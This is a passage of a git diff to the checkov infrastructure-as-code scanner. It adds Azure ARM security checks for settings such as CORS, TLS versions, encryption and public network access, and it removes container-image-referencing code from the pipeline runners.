AppServiceDisallowCORS(BaseResourceNegativeValueCheck): + def __init__(self) -> None: + name = "Ensure that CORS disallows every resource to access app services" + id = "CKV_AZURE_57" + supported_resources = ("Microsoft.Web/sites",) + categories = (CheckCategories.GENERAL_SECURITY,) + super().__init__( + name=name, + id=id, + categories=categories, + supported_resources=supported_resources, + missing_block_result=CheckResult.PASSED + ) + + def get_inspected_key(self) -> str: + return 'properties/siteConfig/cors/allowedOrigins' + + def get_forbidden_values(self) -> List[Any]: + return ['*'] + + +check = AppServiceDisallowCORS() diff --git a/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py b/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py index 7cce9eae3f5..415d32c6ac9 100644 --- a/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py +++ b/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py @@ -14,7 +14,7 @@ def get_inspected_key(self) -> str: return "properties/netFrameworkVersion" def get_expected_value(self) -> str: - return "v7.0" + return "v8.0" check = AppServiceDotnetFrameworkVersion() diff --git a/checkov/arm/checks/resource/AppServiceIdentityProviderEnabled.py b/checkov/arm/checks/resource/AppServiceIdentityProviderEnabled.py new file mode 100644 index 00000000000..ce0540ad8f7 --- /dev/null +++ b/checkov/arm/checks/resource/AppServiceIdentityProviderEnabled.py @@ -0,0 +1,22 @@ +from typing import Any +from checkov.common.models.consts import ANY_VALUE +from checkov.common.models.enums import CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class AppServiceIdentityProviderEnabled(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure that Managed identity provider is enabled for web apps" + id = "CKV_AZURE_71" + supported_resources = ('Microsoft.Web/sites',) + categories = (CheckCategories.GENERAL_SECURITY,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return "identity/type" + + def get_expected_value(self) -> Any: + return ANY_VALUE + + +check = AppServiceIdentityProviderEnabled() diff --git a/checkov/arm/checks/resource/AppServiceJavaVersion.py b/checkov/arm/checks/resource/AppServiceJavaVersion.py new file mode 100644 index 00000000000..759c6fa197b --- /dev/null +++ b/checkov/arm/checks/resource/AppServiceJavaVersion.py @@ -0,0 +1,22 @@ +from typing import Any +from checkov.common.models.enums import CheckResult, CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class AppServiceJavaVersion(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure that 'Java version' is the latest, if used to run the web app" + id = "CKV_AZURE_83" + supported_resources = ('Microsoft.Web/sites',) + categories = (CheckCategories.GENERAL_SECURITY,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources, + missing_block_result=CheckResult.UNKNOWN) + + def get_inspected_key(self) -> str: + return "siteConfig/javaVersion" + + def get_expected_value(self) -> Any: + return '17' + + +check = AppServiceJavaVersion() diff --git a/checkov/arm/checks/resource/AppServicePythonVersion.py b/checkov/arm/checks/resource/AppServicePythonVersion.py new file mode 100644 index 00000000000..33d62206b09 --- /dev/null +++ b/checkov/arm/checks/resource/AppServicePythonVersion.py @@ -0,0 +1,28 @@ +from typing import List, Any + +from checkov.arm.base_resource_value_check import BaseResourceValueCheck +from checkov.common.models.enums import CheckCategories, CheckResult + + +class AppServicePythonVersion(BaseResourceValueCheck): + + def __init__(self) -> None: + name = "Ensure that 'Python version' is the latest, if used to run the web app" + id = "CKV_AZURE_82" + supported_resources = ("Microsoft.Web/sites",) + categories = (CheckCategories.GENERAL_SECURITY,) + super().__init__( + name=name, + id=id, + categories=categories, + supported_resources=supported_resources, + missing_block_result=CheckResult.UNKNOWN) + + def get_inspected_key(self) -> str: + return "properties/siteConfig/pythonVersion" + + def get_expected_values(self) -> List[Any]: + return ["3.9", "3.10", "3.11", "3.12"] + + +check = AppServicePythonVersion() diff --git a/checkov/arm/checks/resource/AppServiceRemoteDebuggingNotEnabled.py b/checkov/arm/checks/resource/AppServiceRemoteDebuggingNotEnabled.py new file mode 100644 index 00000000000..43347201879 --- /dev/null +++ b/checkov/arm/checks/resource/AppServiceRemoteDebuggingNotEnabled.py @@ -0,0 +1,21 @@ +from checkov.common.models.enums import CheckCategories, CheckResult +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class AppServiceRemoteDebuggingNotEnabled(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure that remote debugging is not enabled for app services" + id = "CKV_AZURE_72" + supported_resources = ["Microsoft.Web/sites",] + categories = [CheckCategories.GENERAL_SECURITY,] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources, + missing_block_result=CheckResult.PASSED,) + + def get_inspected_key(self) -> str: + return "properties/siteConfig/remoteDebuggingEnabled" + + def get_expected_value(self) -> bool: + return False + + +check = AppServiceRemoteDebuggingNotEnabled() diff --git a/checkov/arm/checks/resource/AutomationEncrypted.py b/checkov/arm/checks/resource/AutomationEncrypted.py new file mode 100644 index 00000000000..fab47e55e58 --- /dev/null +++ b/checkov/arm/checks/resource/AutomationEncrypted.py @@ -0,0 +1,20 @@ +from checkov.arm.base_resource_value_check import BaseResourceValueCheck +from checkov.common.models.enums import CheckCategories + + +class AutomationEncrypted(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure that Automation account variables are encrypted" + id = "CKV_AZURE_73" + supported_resources = ("Microsoft.Automation/automationAccounts/variables",) + categories = (CheckCategories.ENCRYPTION,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return "properties/isEncrypted" + + def get_expected_value(self) -> bool: + return True + + +check = AutomationEncrypted() diff --git a/checkov/arm/checks/resource/AzureBatchAccountUsesKeyVaultEncryption.py b/checkov/arm/checks/resource/AzureBatchAccountUsesKeyVaultEncryption.py new file mode 100644 index 00000000000..c29e9797da5 --- /dev/null +++ b/checkov/arm/checks/resource/AzureBatchAccountUsesKeyVaultEncryption.py @@ -0,0 +1,22 @@ +from checkov.common.models.consts import ANY_VALUE +from typing import Any +from checkov.common.models.enums import CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class AzureBatchAccountUsesKeyVaultEncryption(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure that Azure Batch account uses key vault to encrypt data" + id = "CKV_AZURE_76" + supported_resources = ("Microsoft.Batch/batchAccounts",) + categories = [CheckCategories.ENCRYPTION] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,) + + def get_inspected_key(self) -> str: + return "properties/keyVaultReference" + + def get_expected_value(self) -> Any: + return ANY_VALUE + + +check = AzureBatchAccountUsesKeyVaultEncryption() diff --git a/checkov/arm/checks/resource/AzureDefenderOnStorage.py b/checkov/arm/checks/resource/AzureDefenderOnStorage.py new file mode 100644 index 00000000000..ebc2f4ba81a --- /dev/null +++ b/checkov/arm/checks/resource/AzureDefenderOnStorage.py @@ -0,0 +1,27 @@ +from typing import Any, Dict, List +from checkov.common.models.enums import CheckCategories, CheckResult +from checkov.arm.base_resource_check import BaseResourceCheck + + +class AzureDefenderOnStorage(BaseResourceCheck): + def __init__(self) -> None: + name = "Ensure that Azure Defender is set to On for Storage" + id = "CKV_AZURE_84" + supported_resources = ("Microsoft.Security/pricings",) + categories = (CheckCategories.GENERAL_SECURITY,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def scan_resource_conf(self, conf: Dict[str, Any]) -> CheckResult: + properties: Dict[str, Any] = conf.get("properties", {}) + pricingTier = properties.get("pricingTier", "") + return ( + CheckResult.PASSED + if pricingTier == "Standard" + else CheckResult.FAILED + ) + + def get_evaluated_keys(self) -> List[str]: + return ["properties/pricingTier"] + + +check = AzureDefenderOnStorage() diff --git a/checkov/arm/checks/resource/AzureMLWorkspacePrivateEndpoint.py b/checkov/arm/checks/resource/AzureMLWorkspacePrivateEndpoint.py new file mode 100644 index 00000000000..221c990d5e6 --- /dev/null +++ b/checkov/arm/checks/resource/AzureMLWorkspacePrivateEndpoint.py @@ -0,0 +1,33 @@ +from typing import Dict, Any + +from checkov.common.models.enums import CheckCategories, CheckResult +from checkov.arm.base_resource_check import BaseResourceCheck +from checkov.common.util.consts import START_LINE, END_LINE + + +class AzureMLWorkspacePrivateEndpoint(BaseResourceCheck): + def __init__(self) -> None: + name = "Ensure Azure Machine learning workspace is not configured with private endpoint" + id = "CKV_AZURE_239" + supported_resources = ["Microsoft.MachineLearningServices/workspaces"] + categories = [CheckCategories.NETWORKING] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def scan_resource_conf(self, conf: Dict[str, Any]) -> CheckResult: + properties = conf.get("properties") + if isinstance(properties, dict): + managed_network = properties.get("managedNetwork") + if isinstance(managed_network, dict): + ob_rules = managed_network.get("outboundRules") + if isinstance(ob_rules, dict): + # check no outbound rule has private endpoint type + for key, rule in ob_rules.items(): + if key in [START_LINE, END_LINE]: + # Skip inner fields we add + continue + if rule.get("type") == "PrivateEndpoint": + return CheckResult.FAILED + return CheckResult.PASSED + + +check = AzureMLWorkspacePrivateEndpoint() diff --git a/checkov/arm/checks/resource/CognitiveServicesConfigureIdentity.py b/checkov/arm/checks/resource/CognitiveServicesConfigureIdentity.py new file mode 100644 index 00000000000..f81ccf0a89f --- /dev/null +++ b/checkov/arm/checks/resource/CognitiveServicesConfigureIdentity.py @@ -0,0 +1,22 @@ +from typing import Any +from checkov.common.models.consts import ANY_VALUE +from checkov.common.models.enums import CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class CognitiveServicesConfigureIdentity(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure that Cognitive Services account is not configured with managed identity" + id = "CKV_AZURE_238" + supported_resources = ('Microsoft.CognitiveServices/accounts',) + categories = (CheckCategories.GENERAL_SECURITY,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return "identity/type" + + def get_expected_value(self) -> Any: + return ANY_VALUE + + +check = CognitiveServicesConfigureIdentity() diff --git a/checkov/arm/checks/resource/CognitiveServicesEnableLocalAuth.py b/checkov/arm/checks/resource/CognitiveServicesEnableLocalAuth.py new file mode 100644 index 00000000000..3ea82d18af6 --- /dev/null +++ b/checkov/arm/checks/resource/CognitiveServicesEnableLocalAuth.py @@ -0,0 +1,27 @@ +from typing import Any + +from checkov.common.models.enums import CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class CognitiveServicesEnableLocalAuth(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure that Cognitive Services accounts enable local authentication" + id = "CKV_AZURE_236" + supported_resources = ('Microsoft.CognitiveServices/accounts', ) + categories = (CheckCategories.NETWORKING, ) + super().__init__( + name=name, + id=id, + categories=categories, + supported_resources=supported_resources, + ) + + def get_inspected_key(self) -> str: + return 'properties/disableLocalAuth' + + def get_expected_value(self) -> Any: + return True + + +check = CognitiveServicesEnableLocalAuth() diff --git a/checkov/arm/checks/resource/DataExplorerUsesDiskEncryption.py b/checkov/arm/checks/resource/DataExplorerUsesDiskEncryption.py new file mode 100644 index 00000000000..785063e4b29 --- /dev/null +++ b/checkov/arm/checks/resource/DataExplorerUsesDiskEncryption.py @@ -0,0 +1,20 @@ +from checkov.common.models.enums import CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class DataExplorerUsesDiskEncryption(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure that Azure Data Explorer (Kusto) uses disk encryption" + id = "CKV_AZURE_74" + supported_resources = ("Microsoft.Kusto/clusters",) + categories = [CheckCategories.ENCRYPTION,] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,) + + def get_inspected_key(self) -> str: + return "properties/enableDiskEncryption" + + def get_expected_value(self) -> bool: + return True + + +check = DataExplorerUsesDiskEncryption() diff --git a/checkov/arm/checks/resource/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py b/checkov/arm/checks/resource/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py new file mode 100644 index 00000000000..ee16ea9731f --- /dev/null +++ b/checkov/arm/checks/resource/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py @@ -0,0 +1,32 @@ +from __future__ import annotations + +from typing import Any + +from checkov.common.models.enums import CheckResult, CheckCategories +from checkov.arm.base_resource_check import BaseResourceCheck +from checkov.common.util.data_structures_utils import find_in_dict + + +class DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey(BaseResourceCheck): + def __init__(self) -> None: + # https://learn.microsoft.com/en-us/azure/templates/microsoft.databricks/workspaces?pivots=deployment-language-arm-template#workspaceencryptionparameter-1 + name = "Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption" + id = "CKV2_AZURE_48" + supported_resources = ("Microsoft.Databricks/workspaces",) + categories = (CheckCategories.ENCRYPTION,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult: + parameters = conf.get("properties", {}).get("parameters") + prepare_encryption = find_in_dict(input_dict=parameters, key_path="prepareEncryption/value") + if not prepare_encryption or str(prepare_encryption).lower() != "true": + return CheckResult.FAILED + + encryption_settings = find_in_dict(input_dict=parameters, key_path="encryption/value") + if not encryption_settings: + return CheckResult.FAILED + + return CheckResult.PASSED + + +check = DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey() diff --git a/checkov/arm/checks/resource/DatabricksWorkspaceIsNotPublic.py b/checkov/arm/checks/resource/DatabricksWorkspaceIsNotPublic.py new file mode 100644 index 00000000000..aaae17689c8 --- /dev/null +++ b/checkov/arm/checks/resource/DatabricksWorkspaceIsNotPublic.py @@ -0,0 +1,27 @@ +from __future__ import annotations + +from typing import Any + +from checkov.common.models.enums import CheckResult, CheckCategories +from checkov.arm.base_resource_check import BaseResourceCheck +from checkov.common.util.data_structures_utils import find_in_dict + + +class DatabricksWorkspaceIsNotPublic(BaseResourceCheck): + def __init__(self) -> None: + # https://learn.microsoft.com/en-us/azure/templates/microsoft.databricks/workspaces?pivots=deployment-language-arm-template + name = "Ensure Databricks Workspace data plane to control plane communication happens over private link" + id = "CKV_AZURE_158" + supported_resources = ("Microsoft.Databricks/workspaces",) + categories = (CheckCategories.NETWORKING,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult: + public_network_access = find_in_dict(input_dict=conf, key_path="properties/publicNetworkAccess") + if not public_network_access or public_network_access == "Enabled": + return CheckResult.FAILED + + return CheckResult.PASSED + + +check = DatabricksWorkspaceIsNotPublic() diff --git a/checkov/arm/checks/resource/FunctionAppDisallowCORS.py b/checkov/arm/checks/resource/FunctionAppDisallowCORS.py new file mode 100644 index 00000000000..e8b98b464d5 --- /dev/null +++ b/checkov/arm/checks/resource/FunctionAppDisallowCORS.py @@ -0,0 +1,24 @@ +from typing import List, Any +from checkov.common.models.enums import CheckCategories, CheckResult +from checkov.arm.base_resource_negative_value_check import BaseResourceNegativeValueCheck + + +class FunctionAppDisallowCORS(BaseResourceNegativeValueCheck): + + def __init__(self) -> None: + name = "Ensure function apps are not accessible from all regions" + id = "CKV_AZURE_62" + supported_resources = ("Microsoft.Web/sites",) + categories = (CheckCategories.GENERAL_SECURITY,) + super().__init__(name=name, id=id, categories=categories, + supported_resources=supported_resources, + missing_block_result=CheckResult.PASSED) + + def get_inspected_key(self) -> str: + return "properties/siteConfig/cors/allowedOrigins" + + def get_forbidden_values(self) -> List[Any]: + return ["*"] + + +check = FunctionAppDisallowCORS() diff --git a/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py b/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py new file mode 100644 index 00000000000..a514d7983f7 --- /dev/null +++ b/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py @@ -0,0 +1,22 @@ +from checkov.arm.base_resource_value_check import BaseResourceValueCheck +from checkov.common.models.enums import CheckCategories + + +class FunctionAppHttpVersionLatest(BaseResourceValueCheck): + + def __init__(self) -> None: + name = "Ensure that 'HTTP Version' is the latest, if used to run the Function app" + id = "CKV_AZURE_67" + supported_resources = ("Microsoft.Web/sites/slots", "Microsoft.Web/sites",) + categories = (CheckCategories.GENERAL_SECURITY,) + super().__init__( + name=name, + id=id, + categories=categories, + supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return "properties/siteConfig/http20Enabled" + + +check = FunctionAppHttpVersionLatest() diff --git a/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py b/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py new file mode 100644 index 00000000000..cefe0dd5825 --- /dev/null +++ b/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py @@ -0,0 +1,26 @@ +from typing import Any, List + +from checkov.common.models.enums import CheckResult, CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class FunctionAppMinTLSVersion(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure Function app is using the latest version of TLS encryption" + id = "CKV_AZURE_145" + supported_resources = ('Microsoft.Web/sites', 'Microsoft.Web/sites/slots',) + categories = [CheckCategories.NETWORKING] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources, + missing_block_result=CheckResult.PASSED) + + def get_inspected_key(self) -> str: + return "properties/siteConfig/minTlsVersion" + + def get_expected_value(self) -> Any: + return 1.2 + + def get_expected_values(self) -> List[Any]: + return ["1.2", 1.2] + + +check = FunctionAppMinTLSVersion() diff --git a/checkov/arm/checks/resource/FunctionAppsEnableAuthentication.py b/checkov/arm/checks/resource/FunctionAppsEnableAuthentication.py new file mode 100644 index 00000000000..f9d7e801595 --- /dev/null +++ b/checkov/arm/checks/resource/FunctionAppsEnableAuthentication.py @@ -0,0 +1,23 @@ +from checkov.arm.base_resource_value_check import BaseResourceValueCheck +from checkov.common.models.enums import CheckCategories + + +class FunctionAppsEnableAuthentication(BaseResourceValueCheck): + + def __init__(self) -> None: + name = "Ensure that function apps enables Authentication" + id = "CKV_AZURE_56" + supported_resources = ("Microsoft.Web/sites/config",) + categories = (CheckCategories.GENERAL_SECURITY,) + super().__init__(name=name, + id=id, + categories=categories, + supported_resources=supported_resources, + + ) + + def get_inspected_key(self) -> str: + return 'properties/platform/enabled' + + +check = FunctionAppsEnableAuthentication() diff --git a/checkov/arm/checks/resource/MSSQLServerMinTLSVersion.py b/checkov/arm/checks/resource/MSSQLServerMinTLSVersion.py new file mode 100644 index 00000000000..55669a57f29 --- /dev/null +++ b/checkov/arm/checks/resource/MSSQLServerMinTLSVersion.py @@ -0,0 +1,24 @@ +from checkov.common.models.enums import CheckCategories, CheckResult +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class MSSQLServerMinTLSVersion(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure MSSQL is using the latest version of TLS encryption" + id = "CKV_AZURE_52" + supported_resources = ("Microsoft.Sql/servers",) + categories = (CheckCategories.NETWORKING,) + super().__init__(name=name, + id=id, + categories=categories, + supported_resources=supported_resources, + missing_block_result=CheckResult.FAILED,) + + def get_inspected_key(self) -> str: + return "properties/minimalTlsVersion" + + def get_expected_value(self) -> str: + return "1.2" + + +check = MSSQLServerMinTLSVersion() diff --git a/checkov/arm/checks/resource/MySQLPublicAccessDisabled.py b/checkov/arm/checks/resource/MySQLPublicAccessDisabled.py new file mode 100644 index 00000000000..6336a41668a --- /dev/null +++ b/checkov/arm/checks/resource/MySQLPublicAccessDisabled.py @@ -0,0 +1,23 @@ +from checkov.common.models.enums import CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class MySQLPublicAccessDisabled(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure 'public network access enabled' is set to 'False' for mySQL servers" + id = "CKV_AZURE_53" + supported_resources = ("Microsoft.DBforMySQL/servers",) + categories = (CheckCategories.NETWORKING,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return "properties/publicNetworkAccess" + + def get_expected_value(self) -> str: + """ + Returns the default expected value, governed by provider best practices + """ + return "disabled" + + +check = MySQLPublicAccessDisabled() diff --git a/checkov/arm/checks/resource/MySQLServerMinTLSVersion.py b/checkov/arm/checks/resource/MySQLServerMinTLSVersion.py new file mode 100644 index 00000000000..ddba3b1261d --- /dev/null +++ b/checkov/arm/checks/resource/MySQLServerMinTLSVersion.py @@ -0,0 +1,23 @@ +from checkov.common.models.enums import CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class MySQLServerMinTLSVersion(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure MySQL is using the latest version of TLS encryption" + id = "CKV_AZURE_54" + supported_resources = ("Microsoft.DBforMySQL/servers",) + categories = (CheckCategories.NETWORKING,) + super().__init__(name=name, + id=id, + categories=categories, + supported_resources=supported_resources, ) + + def get_inspected_key(self) -> str: + return "properties/minimalTlsVersion" + + def get_expected_value(self) -> str: + return "TLS1_2" + + +check = MySQLServerMinTLSVersion() diff --git a/checkov/arm/checks/resource/StorageSyncPublicAccessDisabled.py b/checkov/arm/checks/resource/StorageSyncPublicAccessDisabled.py new file mode 100644 index 00000000000..cca500a26dd --- /dev/null +++ b/checkov/arm/checks/resource/StorageSyncPublicAccessDisabled.py @@ -0,0 +1,21 @@ +from checkov.common.models.enums import CheckCategories, CheckResult +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class NetworkInterfaceEnableIPForwarding(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure that Azure File Sync disables public network access" + id = "CKV_AZURE_64" + supported_resources = ('Microsoft.StorageSync/storageSyncServices',) + categories = (CheckCategories.NETWORKING,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources, + missing_block_result=CheckResult.FAILED) + + def get_inspected_key(self) -> str: + return 'properties/incomingTrafficPolicy' + + def get_expected_value(self) -> str: + return 'AllowVirtualNetworksOnly' + + +check = NetworkInterfaceEnableIPForwarding() diff --git a/checkov/azure_pipelines/image_referencer/__init__.py b/checkov/azure_pipelines/image_referencer/__init__.py deleted file mode 100644 index e69de29bb2d..00000000000 diff --git a/checkov/azure_pipelines/image_referencer/manager.py b/checkov/azure_pipelines/image_referencer/manager.py deleted file mode 100644 index e87cd8f9955..00000000000 --- a/checkov/azure_pipelines/image_referencer/manager.py +++ /dev/null @@ -1,13 +0,0 @@ -from __future__ import annotations - -from typing import Any - -from checkov.azure_pipelines.image_referencer.provider import AzurePipelinesProvider -from checkov.common.images.workflow.image_referencer_manager import WorkflowImageReferencerManager - - -class AzurePipelinesImageReferencerManager(WorkflowImageReferencerManager): - - def __init__(self, workflow_config: dict[str, Any], file_path: str): - provider = AzurePipelinesProvider(workflow_config=workflow_config, file_path=file_path) - super().__init__(workflow_config, file_path, provider) diff --git a/checkov/azure_pipelines/image_referencer/provider.py b/checkov/azure_pipelines/image_referencer/provider.py deleted file mode 100644 index 7bd00e0bf6f..00000000000 --- a/checkov/azure_pipelines/image_referencer/provider.py +++ /dev/null @@ -1,71 +0,0 @@ -from __future__ import annotations - -from typing import Any - -from checkov.common.images.image_referencer import Image -from checkov.azure_pipelines.common.resource_id_utils import generate_resource_key_recursive -from checkov.common.images.workflow.image_referencer_provider import WorkflowImageReferencerProvider - - -class AzurePipelinesProvider(WorkflowImageReferencerProvider): - - def __init__(self, workflow_config: dict[str, Any], file_path: str): - super().__init__(workflow_config, file_path) - self.supported_keys = "container" - - def extract_images_from_workflow(self) -> list[Image]: - """ - We use a general extraction in azure_pipelines because we can display images in different ways: - - container - - container.image - - resources.containers[].container... - - jobs[].container... - - jobs[].steps.task.inputs.container... - - jobs[].strategy.container... - - stages[].jobs[]... - """ - images = self.extract_images_from_dict(self.workflow_config) - return images - - def extract_images_from_list(self, objects_list: list[dict[str, Any]]) -> list[Image]: - images = [] - for job in objects_list: - if isinstance(job, dict): - images.extend(self.extract_images_from_dict(job)) - if isinstance(job, list): - images.extend(self.extract_images_from_list(job)) - return images - - def extract_images_from_dict(self, job: dict[str, Any]) -> list[Image]: - images = [] - start_line, end_line = AzurePipelinesProvider._get_start_end_lines(job) - for key, sub_job in job.items(): - if key == self.supported_keys: - image = self.create_image(sub_job, start_line, end_line) - if image: - images.append(image) - elif isinstance(sub_job, dict): - images.extend(self.extract_images_from_dict(sub_job)) - elif isinstance(sub_job, list): - images.extend(self.extract_images_from_list(sub_job)) - return images - - def create_image(self, container: dict[str, Any] | str, start_line: int, end_line: int) -> Image | None: - image_name = '' - if isinstance(container, str): - image_name = container - elif isinstance(container, dict): - if 'image' in container: - image_name = container['image'] - related_resource_id = generate_resource_key_recursive(file_conf=self.workflow_config, - resource_key='', - start_line=start_line, - end_line=end_line) - if image_name and related_resource_id: - return Image( - file_path=self.file_path, - name=image_name, - start_line=start_line, - end_line=end_line, - related_resource_id=related_resource_id) - return None diff --git a/checkov/azure_pipelines/runner.py b/checkov/azure_pipelines/runner.py index baf6a8535c5..2ff89a2c387 100644 --- a/checkov/azure_pipelines/runner.py +++ b/checkov/azure_pipelines/runner.py @@ -1,24 +1,19 @@ from __future__ import annotations -import os from typing import TYPE_CHECKING, Any, Optional from checkov.azure_pipelines.checks.registry import registry from checkov.azure_pipelines.common.resource_id_utils import generate_resource_key_recursive -from checkov.azure_pipelines.image_referencer.manager import AzurePipelinesImageReferencerManager -from checkov.common.images.image_referencer import ImageReferencerMixin, Image from checkov.common.output.report import CheckType, Report from checkov.runner_filter import RunnerFilter from checkov.yaml_doc.runner import Runner as YamlRunner - if TYPE_CHECKING: from checkov.common.checks.base_check_registry import BaseCheckRegistry from collections.abc import Iterable - from networkx import DiGraph -class Runner(ImageReferencerMixin["dict[str, dict[str, Any] | list[dict[str, Any]]]"], YamlRunner): +class Runner(YamlRunner): check_type = CheckType.AZURE_PIPELINES # noqa: CCE003 # a static attribute def require_external_checks(self) -> bool: @@ -57,43 +52,4 @@ def run( runner_filter = runner_filter or RunnerFilter() report = super().run(root_folder=root_folder, external_checks_dir=external_checks_dir, files=files, runner_filter=runner_filter, collect_skip_comments=collect_skip_comments) - if runner_filter.run_image_referencer: - if files: - # 'root_folder' shouldn't be empty to remove the whole path later and only leave the shortened form - root_folder = os.path.split(os.path.commonprefix(files))[0] - - image_report = self.check_container_image_references( - root_path=root_folder, - runner_filter=runner_filter, - definitions=self.definitions - ) - - if image_report: - return [report, image_report] # type:ignore[list-item] # report can only be of type Report, not a list - return report - - def extract_images( - self, - graph_connector: DiGraph | None = None, - definitions: dict[str, dict[str, Any] | list[dict[str, Any]]] | None = None, - definitions_raw: dict[str, list[tuple[int, str]]] | None = None - ) -> list[Image]: - images: list[Image] = [] - if not definitions: - return images - - for file, config in definitions.items(): - if isinstance(config, list): - continue - is_container = False - for row in self.definitions_raw.get(file, []): - if 'container' in row[1]: - is_container = True - break - if not is_container: - return images - manager = AzurePipelinesImageReferencerManager(workflow_config=config, file_path=file) - images.extend(manager.extract_images_from_workflow()) - - return images diff --git a/checkov/bitbucket_pipelines/runner.py b/checkov/bitbucket_pipelines/runner.py index 9114527adba..3f617c8768a 100644 --- a/checkov/bitbucket_pipelines/runner.py +++ b/checkov/bitbucket_pipelines/runner.py @@ -1,11 +1,8 @@ from __future__ import annotations -from typing import Any, TYPE_CHECKING, cast - -import jmespath +from typing import Any, TYPE_CHECKING from checkov.bitbucket_pipelines.registry import registry -from checkov.common.images.image_referencer import ImageReferencer, Image from checkov.common.bridgecrew.check_type import CheckType from checkov.yaml_doc.runner import Runner as YamlRunner @@ -13,7 +10,7 @@ from checkov.common.checks.base_check_registry import BaseCheckRegistry -class Runner(YamlRunner, ImageReferencer): +class Runner(YamlRunner): check_type = CheckType.BITBUCKET_PIPELINES # noqa: CCE003 # a static attribute def __init__(self) -> None: @@ -25,15 +22,6 @@ def require_external_checks(self) -> bool: def import_registry(self) -> BaseCheckRegistry: return registry - @staticmethod - def _parse_file( - f: str, file_content: str | None = None - ) -> tuple[dict[str, Any] | list[dict[str, Any]], list[tuple[int, str]]] | None: - if Runner.is_workflow_file(f): - return YamlRunner._parse_file(f) - - return None - @staticmethod def is_workflow_file(file_path: str) -> bool: """ @@ -41,103 +29,11 @@ def is_workflow_file(file_path: str) -> bool: """ return file_path.endswith(("bitbucket-pipelines.yml", "bitbucket-pipelines.yaml")) - def get_images(self, file_path: str) -> set[Image]: - """ - Get container images mentioned in a file - :param file_path: File to be inspected - - File sample that will return 4 Image objects: - #image: node:10.15.0 - # - #pipelines: - # default: - # - step: - # name: Build and test - # image: node:10.0.0 - # script: - # - npm install - # - npm test - # - npm run build - # artifacts: - # - dist/** - # - step: - # name: Deploy - # image: python:3.7.2 - # trigger: manual - # script: - # - python deploy.py - # custom: - # sonar: - # - step: - # image: python:3.8.2 - # script: - # - echo "Manual triggers for Sonar are awesome!" - # deployment-to-prod: - # - step: - # script: - # - echo "Manual triggers for deployments are awesome!" - # branches: - # staging: - # - step: - # script: - # - echo "Auto pipelines are cool too." - :return: List of container image objects mentioned in the file. - - """ - - images: set[Image] = set() - parsed_file = self._parse_file(file_path) - - if not parsed_file: - return images - - workflow, workflow_line_numbers = parsed_file - - if not isinstance(workflow, dict): - # make type checking happy - return images - - self.add_default_and_pipelines_images(workflow, images, file_path) - self.add_root_image(file_path, images, workflow_line_numbers, workflow) - - return images - - def add_default_and_pipelines_images(self, workflow: dict[str, Any], images: set[Image], file_path: str) -> None: - """ - - :param workflow: parsed workflow file - :param images: set of images to be updated - :param file_path: path of analyzed workflow - """ - keywords = [ - "pipelines.default[].step.{image: image, __startline__: __startline__, __endline__:__endline__}", - "pipelines.*.[*][][][].step.{image: image, __startline__: __startline__, __endline__:__endline__}", - ] - for keyword in keywords: - results = cast("list[dict[str, 